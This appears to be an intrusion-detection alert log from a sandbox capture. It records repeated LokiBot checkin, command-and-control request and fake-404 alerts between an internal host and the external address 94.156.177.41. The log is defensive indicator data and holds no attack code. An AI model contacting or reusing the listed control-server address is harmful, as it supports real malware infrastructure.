2024-12-09T08:51:46.735993+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49712	TCP
2024-12-09T08:51:46.997946+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:46.997946+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:46.997946+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:48.439293+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:48.439293+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:48.558599+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49713	TCP
2024-12-09T08:51:48.825174+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:48.825174+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:48.825174+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:50.109741+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:50.109741+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:50.229157+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49715	TCP
2024-12-09T08:51:50.500278+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:50.500278+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:50.500278+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:52.322198+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:52.322198+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:52.441798+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49721	TCP
2024-12-09T08:51:52.709648+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:52.709648+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:52.709648+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:53.986106+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:53.986106+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:54.105409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49726	TCP
2024-12-09T08:51:54.371881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:54.371881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:54.371881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:55.804149+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:55.804149+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:55.923388+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49732	TCP
2024-12-09T08:51:56.186859+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:51:56.186859+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:51:56.186859+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:00.480412+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:00.480412+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:00.604257+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49736	TCP
2024-12-09T08:52:00.874032+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:00.874032+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:00.874032+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:02.310802+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:02.310802+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:02.430253+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49755	TCP
2024-12-09T08:52:02.924152+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:02.924152+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:02.924152+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:07.215515+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:07.215515+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:07.334848+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49757	TCP
2024-12-09T08:52:07.593802+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:07.593802+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:07.593802+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:09.028698+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:09.028698+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:09.148041+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49773	TCP
2024-12-09T08:52:09.406949+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:09.406949+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:09.406949+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:10.848504+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:10.848504+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:10.967759+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49775	TCP
2024-12-09T08:52:11.232353+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:11.232353+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:11.232353+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:13.030024+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:13.030024+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:13.150006+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49781	TCP
2024-12-09T08:52:13.423061+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:13.423061+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:13.423061+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:15.247122+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:15.247122+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:15.380232+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49787	TCP
2024-12-09T08:52:15.682605+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:15.682605+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:15.682605+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:16.935958+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:16.935958+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:17.055207+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49793	TCP
2024-12-09T08:52:17.325150+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:17.325150+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:17.325150+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:21.764409+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:21.764409+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:21.883707+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49799	TCP
2024-12-09T08:52:22.154447+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:22.154447+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:22.154447+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:23.587495+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:23.587495+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:23.706862+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49811	TCP
2024-12-09T08:52:23.972500+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:23.972500+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:23.972500+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:25.264366+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:25.264366+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:25.383816+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49818	TCP
2024-12-09T08:52:25.653268+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:25.653268+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:25.653268+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:27.091553+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:27.091553+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:27.211831+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49823	TCP
2024-12-09T08:52:27.621178+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:27.621178+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:27.621178+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:28.905374+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:28.905374+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:29.025072+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49828	TCP
2024-12-09T08:52:29.310465+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:29.310465+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:29.310465+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:30.743567+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:30.743567+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:30.869216+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49833	TCP
2024-12-09T08:52:31.142639+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:31.142639+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:31.142639+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:32.430394+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:32.430394+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:32.583829+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49836	TCP
2024-12-09T08:52:32.844275+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:32.844275+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:32.844275+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:34.283694+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:34.283694+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:34.403160+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49841	TCP
2024-12-09T08:52:34.672995+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:34.672995+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:34.672995+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:36.102690+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:36.102690+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:36.222043+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49848	TCP
2024-12-09T08:52:36.479932+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:36.479932+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:36.479932+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:37.818426+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:37.818426+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:37.937696+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49854	TCP
2024-12-09T08:52:38.214537+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:38.214537+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:38.214537+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:39.497811+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:39.497811+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:39.617090+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49859	TCP
2024-12-09T08:52:39.872509+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:39.872509+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:39.872509+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:41.152631+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:41.152631+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:41.271992+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49863	TCP
2024-12-09T08:52:41.529353+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:41.529353+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:41.529353+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:42.964742+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:42.964742+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:43.084245+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49867	TCP
2024-12-09T08:52:43.346921+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:43.346921+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:43.346921+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:44.776414+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:44.776414+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:44.895864+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49873	TCP
2024-12-09T08:52:45.154565+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:45.154565+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:45.154565+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:46.592675+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:46.592675+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:46.712064+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49879	TCP
2024-12-09T08:52:46.983185+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:46.983185+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:46.983185+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:48.268574+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:48.268574+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:48.387942+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49885	TCP
2024-12-09T08:52:48.658727+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:48.658727+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:48.658727+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:50.978504+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:50.978504+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:51.098178+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49888	TCP
2024-12-09T08:52:51.358825+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:51.358825+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:51.358825+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:52.651034+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:52.651034+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:52.770279+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49896	TCP
2024-12-09T08:52:53.027579+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:53.027579+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:53.027579+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:54.731708+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:54.731708+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:54.851047+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49900	TCP
2024-12-09T08:52:55.108776+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:55.108776+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:55.108776+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:56.395944+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:56.395944+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:56.515239+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49906	TCP
2024-12-09T08:52:56.790419+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:56.790419+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:56.790419+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:58.223873+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49911	94.156.177.41	80	TCP
